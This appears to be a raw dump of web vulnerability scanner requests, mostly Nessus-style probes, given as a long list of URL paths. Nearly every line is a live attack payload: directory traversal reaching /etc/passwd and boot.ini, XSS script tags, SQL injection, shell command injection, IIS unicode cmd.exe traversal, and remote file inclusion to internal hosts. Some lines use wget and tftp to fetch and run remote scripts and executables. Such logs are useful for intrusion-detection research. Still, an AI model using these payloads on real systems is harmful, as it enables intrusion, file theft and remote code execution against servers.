content=\"testziyq=5055\">\n/scripts/eezuu7xc7ge3.php\n/examples/jsp/num/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/cgi-bin/login.pl?course_id=\\\">&lt;script&gt;alert('vulnerable')&lt;/script&gt;\n/help.php?q=';del\\x09q26484164\\x09#\n/en-us/jnv890lt.jsp?<script>cross_site_scripting.nasl</script>\n/phpmyadmin/sources/functions.php?root_path=/etc/passwd\\x00\n/javascript/.htpasswd.sfish/./\n/manager/shoutbox.php?conf=../../../../../../../../etc/passwd\n/dir_thatware/config.php?root_path=http://192.168.202.96:8080/frznctvhi0i5?'\n/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/cgi-bin/search.cgi?..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\windows\\\\win.ini\n/cgi-sys/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/jspx/admin/configset.php?settings_dir=/etc/passwd\\x00\n/aj3pf49c.cfm?<meta http-equiv=set-cookie content=\"testnofv=4170\">\n/transcript_ciowisdom/\n/manager/faxsurvey?cat /etc/passwd\n/ss000007.pl?prodref=<script>alert('vulnerable')</script>\n/scripts/search.jsp?q=%\"<script>alert(1332008323)</script>\n/javascript/boot.exe\n/scripts/fpcount.exe\n/j2kdmfw4.do?<script>cross_site_scripting.nasl</script>\n/ju0u7kfo.php?<script>cross_site_scripting.nasl</script>\n/htmlscript?../../../../../../../../../etc/passwd\n/cacti/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/examples/jsp/colors/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/cgibin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|\n/cgi-exe/webbbs/webbbs_config.pl?body=aaaaffff&email=test@example.com&followup=10;cat /etc/passwd&name=joe\n/ao22ww7y.asp?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/administrator/components/com_feederator/includes/tmsp/subscription.php?globals[mosconfig_absolute_path]=http://192.168.202.96:8080/txenjrxf3?\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/hlgncmwqwx0+>+/dev/null+&').\"]=1\n/cgi-bin/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/yef5f3d5.kspx?<meta http-equiv=set-cookie content=\"testcrcv=6167\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('echo+x;').\"]=1\n/examples/jsp/num/more.php?id=1'\n//../../../../../../../../../../etc/passwd\n/en-us/ddoworrl.nsf?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/examples/jsp/cal/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/index.php?action=login&languages[nessus]=syscp_1211.nasl&language=nessus&langs[nessus][0][file]=/etc/passwd\n/recordings/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/m4kkjf8l.kspx?<script>document.cookie=\"testyglc=8988;\"</script>\n/cgi-bin/includes/config.php?relative_script_path=http://xxxxxxx\n/main.php?stuff=\"\\x0duname\\x09>q25635537\\x09#\n/index.php?\"><script>alert(411775577573)</script>\n/examples/jsp/sessions/wikka.php?wakka=homepage/../../actions/wikkachanges\n/examples/servlets/servlet/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/starnet/addons/slideshow_full.php?album_name='524894511\n/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.118:8080/moclyxlwqyfjnp??\n/top.php?stuff=\"ver;>q48162266&rem;\n/cgi-bin/..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s..\\xc1%8s../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/help.php?q=\"ping;-w;8000;-n;1;4.3.2.1|rem;\n/egaet53a.cgi?<script>cross_site_scripting.nasl</script>\n/e9rx3ya4.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/subscriptions.cpp\n/help.php?q=\"rm q66737251 #\n/examples/jsp/jsp2/jspx/athenareg.php?pass= ;id\n/javascript/amanda.exe\n/main.php?stuff='|sleep 9 #\n/examples/jsp/colors/doc/index.php?s=/etc/passwd\\x00\n/m5103snj.do?<script>cross_site_scripting.nasl</script>\n/ghswfouu.do?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/examples/jsp/num/htmlscript?../../../../../../../../../etc/passwd\n/javascript/.passwd.cpp\n/fc9t54l7.aspx?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331918993',null,null,null,null --\n/xlj7h65o.dll?<script>document.cookie=\"testtbbe=856;\"</script>\n/ygkjkngd.fts?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/en-us/<script>document.cookie=\"testtfvh=2141;\"</script>\n/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/cgi-bin/nph-showlogs.pl?files=../../&filter=.*&linecnt=500&refresh=0&submit=go\n/javascript/htbin.exe\n/tomcat-docs/appdev/sample/web/hello.jsp?test=<script>alert(12345)</script>\n/scripts/onwkbtts3uj1.asp\n/javascript/htpasswd.vb\n/index.php?news7[\"functions\"]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/scripts/modules/news/\n/rbec2ohx.html?<script>cross_site_scripting.nasl</script>\n/en-us/account/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/scripts/calendar.php?serverpath=/etc/passwd\\x00\n/cacti/news.php?prevnext=1'phpnews_prevnext_sql_injection.nasl\n/subscriptions.db\n/javascript/1990.exe\n/javascript/port.exe\n/examples/jsp/error/newsscript.pl?mode=admin\n/script/ident/ident.inc.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?\n/login.php?error=>\"><script>alert('daloradius_error_xss.nasl')</script>\n/main.php?stuff=&uname\\x09>q48138527\\x09#\n/en-us/account/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/examples/jsp/num/listrec.pl?app=qmh-news&template=;ls /etc|\n/scripts/irbf6nj7oyfh.inc\n/examples/jsp/jsp2/jspx/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/javascript/intra.exe\n/\\../\\../\\../boot.ini\n/examples/servlets/servlet/ttawebtop.cgi/?action=start&pg=../../../../../../../../../../../etc/passwd\n/examples/jsp/colors/includes/config.php?relative_script_path=http://xxxxxxx\n/scripts/hyij.exe?/x+/c+tftp -i 192.168.202.118 get botdyoot kvjwnarw.exe\n/zv8tv7h8.nsf?<script>document.cookie=\"testcqwz=9752;\"</script>\n/main.php?logout=\"&uname #\n/javascript/edge.exe\n/scripts/admin/main.asp\n/cgis/htimage.exe/path/filename?2,2\n/scripts/way-board/way-board.cgi?db=/etc/passwd\\x00\n/index.php?username=\"><script>alert(410816083390)</script>\n/en-us/account/include/sql.php?include_path=/etc/passwd\\x00\n/search/submit.php?config[\\\"sipssys\\\"]=@rfiurl\n/main.php?logout=\"&ping,-w,8000,-n,1,1.2.3.4&rem,\n/3m5knyc4.html?<meta http-equiv=set-cookie content=\"testbgqj=6434\">\n/javascript/counts.exe\n/examples/jsp/jsp2/jspx/plugins/safehtml/htmlsax3.php?dir[plugins]=/etc/passwd\\x00\n/scripts/c32web.exe/getimage?imagename=cart32.ini\\x00.gif\n/gallery/index.php?include=../../../../../../../../../etc/passwd\n/javascript/.passwd.sql\n/scripts/vvh_tajyleqq.shtml\n/de3v2dd9.do?<script>cross_site_scripting.nasl</script>\n/vjbrrppi.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/0z575z74.htm?<meta http-equiv=set-cookie content=\"testuhsv=9753\">\n/nyjgaorz.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/msg.exe\n/recordings/includes/third_party/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/7o5qp766.jspa?<script>cross_site_scripting.nasl</script>\n/cgi-exe/windmail.exe? -n c:\\boot.ini hacker@hax0r.com | dir c:\\\\\n/scripts/2pwudii1mt22.html\n/jnt3f86c.fts?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/top.php?stuff=\"rm;q17781936&rem;\n/edzaia0i.cgi?<script>cross_site_scripting.nasl</script>\n/en-us/fo564rei.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/sessions/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\\x00\n/quagynka.htm?<script>cross_site_scripting.nasl</script>\n/manager/webappmon.exe?ins=nowait&act=natping&sel=\"255.255.255.255 & id&\"\n/recordings/pjreview_neo.cgi?p=../../../../../../../../../../etc/passwd\n/inc/download_center_lite.inc.php?script_root=http://192.168.202.118:8080/2aibfaczmac8?\n/main.php?stuff='&uname\\x09>q28979577\\x09#\n/?<script>document.cookie=\"testylfu=1313;\"</script>\n/en-us/n9xlumt5.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/82q7ywa8.cgi?<script>document.cookie=\"testpwew=1315;\"</script>\n/subscriptions.zip\n/examples/jsp/sessions/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/examples/jsp/checkbox/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/3m5knyc4.exe?<script>document.cookie=\"testbgqj=6434;\"</script>\n/vjbrrppi.do?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,989017141953,4,5,6,7,8,9,10,11--\n/main.php?logout=\"&del\\x09q62572113&rem\\x09\n/examples/jsp/jsp2/el/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/javascript/threads.exe\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://cirt.net/rfiinc.txt?\\x00\n/javascript/.htaccess/\\\\'\\\\\"\n/ewc3rz1l.cfm?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/scripts//plugins/db/mysql/mysql.inc.php\n/m4kkjf8l.jspa?<script>document.cookie=\"testyglc=8988;\"</script>\n/genpasswd/\n/help.php?q=ver\\xa0>q18228331&rem\\xa0\n/help.php?q=\"rm;q71157849&rem;\n/javascript/forward.exe\n/top.php?stuff=\"&ver,>q22827927&rem,\n/main.php?stuff=&ver\\x0b>q67415283&rem\\x0b\n/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --\n/recordings/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/scripts/yfmo7jpwvpv1.pl\n/htbin/gwweb.exe?help=bad-request\n/scripts/pssdseehtgdp.html\n/index.php?catid='abc\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/top.php%3fstuff%3d1583574484&frm_user=&scr_height=&scr_width=q87296322\n/jujgxwav.aspx?<meta http-equiv=set-cookie content=\"testknim=9383\">\n/d44uk9h2.cfm?<script>document.cookie=\"testmybc=2088;\"</script>\n/scripts/app_and_readme/navigator/index.php?page=http://192.168.202.96:8080/4dckqcc0acprbz?\n/cs source buy scripts/\n/scripts/gtcatalog/index.php?function=custom&custom=http://xxxxxxxx/1\n/cgi-home/fileseek.cgi?foot=;cat /etc/passwd&head=\n/qur'an-r0/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;/tmp/yrxsovftek;\"\n/help.php?q='\\x0auname >q56533456 #\n/examples/jsp/num/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/scripts/lib/owl_api.php?xrms_file_root=../../../../../../../../../../../../etc/passwd\\x00\n/?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/no4ghqiguzhst??&cmd=id\n/top.php?stuff=\"ver,>q67251581&rem,\n/de3v2dd9.php3?<script>cross_site_scripting.nasl</script>\n/0w155a7c.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/w04ukbv54ixz.asp\n/javascript/funcs.exe\n/msnmsgpasswd/\n/htxqsjbn.exe/\n/scripts/index.php?file=..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\boot.ini\n/javascript/complaint.exe\n/main.php?logout=\"\\x0duname\\x09#\n/6wb70v0b.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/fpsrvadm.exe\n/cgi-bin/search.jsp?q=%\"<script>alert(1331923191)</script>\n/scripts/tools/dsnform\n/h4bi26jd.pl?<meta http-equiv=set-cookie content=\"testhrzx=1150\">\n/search/results.stm?query=&lt;script&gt;alert('vulnerable');&lt;/script&gt;\n/scripts/d3z7yywpyeoa.html\n/en-us/account/search/show.pl?url=file:/etc/passwd\n/examples/jsp/jsp2/el/index.php?id='union/**/select/**/0,0,1398183016,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/cgi-914/ppdscgi.exe\n/cgi-bin/index.php?cat_select=<script>foo</script>\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1332010407\n/phpmyadmin/webplus.exe?script=webplus_install_path.nasl\n/scripts/editor/filemanager/connectors/php/upload.php?command=fileupload&type=file&currentfolder=/fckeditor_currentfolder_file_upload-1331908744.php.\n/vhzmaia2.cfc?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/cacti/myevent.php?myevent_path=/etc/passwd\\x00\n/examples/jsp/error/texis.exe/?-dump\n/main.php?stuff=\"del\\x09q42253935&rem\\x09\n/vjbrrppi.pl?<script>cross_site_scripting.nasl</script>\n/v3axg1p8.htm?<script>document.cookie=\"testxagh=6987;\"</script>\n/top.php?stuff=\"&ping;-w;9000;-n;1;4.3.2.1&rem;\n/help.php?q=\";del\\x09q77596328\\x09#\n/vhzmaia2.nsf?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/cgi-915/testcgi.exe\n/raanw4ia.do?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/setcookie.php?u=../../../../../../../../../../../../etc/passwd\\x00&plugin=pblang_mult_flaws.nasl\n/uc3w3bdi.cfm?<script>document.cookie=\"testxllt=9940;\"</script>\n/main.php?stuff=\"\\x0auname >q45664393 #\n/examples/servlets/servlet/viewcvs.cgi/?cvsroot=<script>foo</script>\n/main.php?logout=\"\\x0arm q92897682 #\n/r3le3om5.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/wikka.php?wakka=homepage/../../actions/wikkachanges\n/script/_conf/core/common-tpl-vars.php?confdir=http://192.168.202.96:8080/4dckqcc0acprbz??\n/script_kiddie/\n/scripts/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332010419,1,722986200--\n/script_path/administrator/components/com_admin/admin.admin.html.php?mosconfig_absolute_path=http://192.168.202.96:8080/4dckqcc0acprbz??\n/awstats/awstats.pl?migrate=|echo;wget -p /tmp/  http://192.168.202.102:80/awseggjbtmlke4cxkgevpex9vn1waa/oyiiraofvl.sh;echo|awstats177554.txt\n/help.php?q='&uname >q95359585 #\n/o1zj4u9v.kspx?<script>document.cookie=\"testabrn=6368;\"</script>\n/examples/jsp/error/menu_dx.php?site_path=../../../../../../../../../../etc/passwd\\x00\n/egaet53a.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/test.php\n/javascript/customer.exe\n/scripts/irbf6nj7oyfh.sh\n/examples/jsp/sessions/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/descriptions/\n/manager/cal_week.php?op=week&catview=999'\n/javascript/standard.exe\n/zdescription2/\n/examples/jsp/jsp2/el/simple/view_page?mv_arg=|cat /etc/passwd|\n/scripts/event_view.php?eid=34 union select 419061143\n/help.php?q='del\\x09q97628579\\x09#\n/h5sc3gxy.mscgi?<script>cross_site_scripting.nasl</script>\n/scgi-bin/cgi-test.exe\n/main.php?stuff='&sleep 7 #\n/javascript/cute.exe\n/examples/jsp/jsp2/jspx/commerce.cgi?page=../../../../../etc/passwd\\x00index.html\n/q703m78q.do?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/quagynka.idc?<script>cross_site_scripting.nasl</script>\n/en-us/9kr0ih0v.php3?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/scripts/rih28haesl0j.inc\n/examples/jsp/error/whois.cgi?action=load&whois=;id\n/scripts/neomail.pl\n/phpmyadmin/inc/exif.inc.php?exif_prog=(echo -n 'original_exif_prog_cmd_exec.nasl: ';id)||echo\n/cacti/store.cgi?startid=../../../../../../../../../etc/passwd\\x00.html\n/main.php?stuff=\"uname >q23955852 #\n/examples/jsp/sessions/zpanel.php?page=/etc/passwd\\x00\n/help.php?q=';uname #\n/ygkjkngd.jsp?<script>document.cookie=\"testnago=4518;\"</script>\n/0rufe52p.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/?<script>document.cookie=\"testlwwz=718;\"</script>\n/jscript5/\n/initscript_services/\n/top.php?stuff=&del;q99662165&rem;\n/javascript/wireless.exe\n/cgi-bin/kb.cgi?view='&lang=en\n/iisadmpwd/..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1..\\xc1\\xc1../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/servlets/servlet/base_qry_common.php?base_path=/etc/passwd\\x00\n/scripts/sc877q2pzqne.pl\n/8x6w469u.dll?<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/javascript/asmx.exe\n/d765w06j.aspx?<script>cross_site_scripting.nasl</script>\n/manager/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/main.php?stuff=\"ping -w 8000 -n 1 4.3.2.1&rem \n/mpcgi/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/iajtej82.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/t578vqea.html?<script>document.cookie=\"testsory=7676;\"</script>\n/gvx7m5ti.mscgi?<meta http-equiv=set-cookie content=\"testwldz=3506\">\n/basexssl/\n/t578vqea.php?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/main.php?stuff='rm q29765145 #\n/javascript/project.exe\n/main.php?logout=\"&rm;q41289753&rem;\n/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/javascript/buildr.exe\n/zmvq66jy.kspx?<script>cross_site_scripting.nasl</script>\n/ydexw8by.nsf?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/bxnyrhmh.kspx?<script>document.cookie=\"testmjct=1867;\"</script>\n/shopsite-xss/\n/fa8p8lr8.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/webcgi/gw5/gwweb.exe?htmlver=aaa&get-context\n//<body><script src=http://www.example.com/test?rnd=q77447371></script>\n/help.php?q=\"\\x0dsleep\\x098\\x09#\n<script>document.cookie=\"testpcbb=9254;\"</script>\n/nuh3zirz.do?<script>cross_site_scripting.nasl</script>\n/cgi-bin/mj_wwwusr?passw=&list=global&user=&func=help&extra=/../../../../../../../../etc/passwd\n/examples/jsp/cal/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/main.php?stuff=';uname >q39366727 #\n/scripts/event_view.php?eid=34 union select 1574505941\n/recordings/ion-p.exe?page=../../../../../etc/passwd\n/phpmyadmin//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\n/examples/jsp/checkbox/awstatstotals.php?sort=\"].phpinfo().exit().$a[\"\n/iv5vkgam.nsf?<script>document.cookie=\"testfosd=94;\"</script>\n/help.php?q=&ver,>q75849859&rem,\n/mail.php?id='/**/union/**/select/**/1,2,1331908888,4--&blog=1\n/6qbynt4f.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,776831339,588291065,1,1,1,1,1--&blogid=1\n/cgi-bin/pfdispaly?../../../../../../etc/passwd\n/9kr0ih0v.do?<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/recordings/source?v=../../../../../../../../../../etc/passwd\\x00\n/script/fckeditor/editor/filemanager/browser/default/browser.html\n/hrttz9fj.mscgi?<script>document.cookie=\"testtbjy=7334;\"</script>\n/examples/jsp/sessions/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/recordings/upgrade/index.php?steporder[]=../../../../../../../../../../../../etc/passwd\\x00\n/javascript/spam.exe\n/forumdisplay.php?fid=21\"><script>x</script>\n/examples/jsp/checkbox/add_url.htm?node=<script>alert('xss')</script>\n/scripts/gallery.scr.php?globals[pth][func]=http://192.168.202.118:8080/ghl9il??\n/scripts/www/admin/index.php\n/examples/jsp/jsp2/jspx/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/recordings/gadgets/blog/blogmodel.php?path=/etc/passwd\\x00\n/en-us/dda2qr7j.exe?<script>cross_site_scripting.nasl</script>\n/info.php?id=411846083448&return_=3444444445'\n/dda2qr7j.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jnt3f86c.jspa?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/examples/jsp/num/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904365&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/main.php?logout=\"&ping\\x09-w\\x098000\\x09-n\\x091\\x091.2.3.4&rem\\x09\n/y8pmygrp.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/<meta http-equiv=set-cookie content=\"testnvxc=4301\">\n/main.php?stuff=\"rm;q96628225&rem;\n/vmi8bb12.mscgi?<script>document.cookie=\"testlerc=2575;\"</script>\n/bxnyrhmh.php?<meta http-equiv=set-cookie content=\"testmjct=1867\">\n/main.php?stuff=\";del q85142671 #\n/index.php?news7[\"functions\"]=http://192.168.202.118:8080/tzhfyzkbomspvm?\n/examples/jsp/cal/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=limbo_com_fm_php_shell.nasl-1331904435\n/popup.php?poll_ident=<script>alert(\"wvs-xss-magic-string-411426083434\")</script>\n/graphic-scripts/\n/yver8r9o.exe?<script>cross_site_scripting.nasl</script>\n/w4996nr0.jsp?<script>document.cookie=\"testttvs=7163;\"</script>\n/scripts/index.php?module=<script>foo</script>\n/scripts/bandwidth/index.cgi?action=showmonth&year=<script>foo</script>&month=<script>foo</script>\n/main.php?stuff=&ver\\x0b>q49399764&rem\\x0b\n/top.php?stuff=\"ping;-w;9000;-n;1;4.3.2.1&rem;\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+555+/tmp/dhbiyrztiq0;').\"]=1\n/examples/jsp/jsp2/el/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/u8yiqilu.cgi?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/y8pmygrp.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/o1zj4u9v.php3?<script>document.cookie=\"testabrn=6368;\"</script>\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/whmch8ftkt7kv?\\x00\n/scripts/login.cgi?username=&command=simple&do=edit&password=&file=|id|\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/utxzfzsgat0+>+/dev/null+&'); function v\n/en-us/account/cgiip.exe/wservice=wsbroker1/webutil/ping.p\n/ttxssh2_107/\n/phpmyadmin/cgiwrap/cgiwrap_error_page_handling_xss.nasl\n/<script>document.cookie=\"testfosd=94;\"</script>\n/recordings/dsweb/services/user-1\"><body onload=alert('xerox_docushare_dsweb_xss.nasl')>\n/edv3mapy.do?<script>cross_site_scripting.nasl</script>\n/scriptpath/index.php?page=http://192.168.202.96:8080/swgnhpydbq0t?\n/nyjgaorz.asp?<script>cross_site_scripting.nasl</script>\n/script/ident/loginliste.php?path_inc=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/phpmyadmin/survey.inc.php?path=/etc/passwd\\x00\n/cgi-bin/bigconf.cgi?command=view_textfile&file=/etc/passwd&filters=;\n/h5sc3gxy.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/salontranscripts/\n/cgis/fileseek2.cgi?foot=;cat /etc/passwd&head=\n/ygkjkngd.nsf?<meta http-equiv=set-cookie content=\"testnago=4518\">\n/jnv890lt.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/jw64yq8u.asp?<script>document.cookie=\"testylfu=1313;\"</script>\n/de3v2dd9.dll?<script>cross_site_scripting.nasl</script>\n/noscriptadimpdisplay/\n/odzk29aa.nsf?<script>document.cookie=\"testtfvh=2141;\"</script>\n/scripts/rih28haesl0j.php\n/vhzmaia2.cgi?<script>document.cookie=\"testkogj=3979;\"</script>\n/javascript/crossdomain.exe\n/minis.php?month=../../../../../../etc/passwd\n/clubbox.exe/\n/examples/jsp/sessions/save.php?file_save=/etc/passwd\n/scripts/database/mpcsoftware_guestdata.mdb\n/examples/jsp/jsp2/el/inc/formmail.inc.php?script_root=../templates/mail.tpl.txt\\x00\n/phpmyadmin/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/examples/jsp/jsp2/jspx/wikka.php?wakka=homepage/../../actions/wikkachanges\n/j2kdmfw4.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/xfkun1ku.php?<script>cross_site_scripting.nasl</script>\n/scripts/lib.inc.php?pm_path=http://xxxxxxxx&sfx=.txt\n/hjdzm96v.cfc?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/w4996nr0.kspx?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/ydexw8by.cgi?<script>document.cookie=\"testulex=4996;\"</script>\n/help.php?q='\\x0adel q83228487 #\n/phpscripts/\n/protectedpage.php?uid=&#039; or &#039;&#039;=&#039;&amp;pwd=&#039; or &#039;&#039;=&#039;\n/help.php?q=\"&ver&rem\\xa0\n/main.php?stuff=';uname >q36774183 #\n/subscriptionservicestoday/\n/examples/jsp/jsp2/jspx/lib/authform.inc.php?path_pre=/etc/passwd\\x00\n/vwmg565s.fts?<script>cross_site_scripting.nasl</script>\n/main.php?stuff='|sleep 8 #\n/manager/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/opensiteadmin/scripts/classes/fieldmanager.php?path=http://192.168.202.96:8080/no4ghqiguzhst?\\x00\n/i686v90l.cfc?<meta http-equiv=set-cookie content=\"testfutf=1550\">\n/htbin/cgi-test.exe\n/main.php?frm_daynight=q13226742&frm_passwd=&frm_referer=http%3a//192.168.26.202/main.php&frm_user=&scr_height=&scr_width=\n/3hlysl2x.exe?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/examples/servlets/servlet/cgi/tseekdir.cgi?location=/etc/passwd\\x00\n/0w155a7c.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/survey.inc.php?path=/etc/passwd\\x00\n/examples/jsp/jsp2/el/include/sql.php?include_path=/etc/passwd\\x00\n/fcgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/radioscripts/\n/examples/jsp/cal/newsdesk.cgi?t=../../../../../../etc/passwd\n/javascript/24.exe\n/javascript/~tmp.exe\n/examples/jsp/jsp2/el/apexec.pl?etype=odp&template=../../../../../../../../../etc/passwd\\x00.html&passurl=/category/\n/ny1b3qq4.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/top.php?stuff=\"&ver&rem,\n/t578vqea.mscgi?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/../../../../../../../../../../etc/passwd\n/_vti_bin/..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c..\\xc1\\x1c../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/main.php?stuff='\\x0duname >q67566355 #\n/scriptie/\n/examples/jsp/jsp2/el/www/delivery/ac.php?bannerid=-1331904367+or+1=1+--+';passthru(base64_decode($_server[http_nessus_x6yxi3nm]));die;/*\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('chmod+555+/tmp/ypsyckgibz0;'); function v\n/javascript/sfish.exe\n/fpnpp5zg.php?<meta http-equiv=set-cookie content=\"testyias=101\">\n/help.php?q=\"&ver\\xa0>q16679515&rem\\xa0\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331904398\n/examples/jsp/cal/help.php?section='qualiteam_xcart_sql_xss.nasl\n/cgi.cgi/view_item?html_file=../../../../../../../../../../etc/passwd\\x00\n/scripts/shops/sub.asp?isub=duamazon_sql_injections.nasl'\n/cacti/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/examples/jsp/checkbox/sawmillcl.exe?ho+{complete_version}\n/bmeun223.php?<script>document.cookie=\"testhhwu=7044;\"</script>\n/scripts/9pen4xzgztjn.pl\n/main.php?logout=ver\\x0b>q39933242&rem\\x0b\n/javascript/sm.exe\n/javascript/zipfiles.exe\n/showcat.php?catid=&lt;script&gt;javascript:alert('vulnerable');&lt;/script&gt;\n/82q7ywa8.mscgi?<meta http-equiv=set-cookie 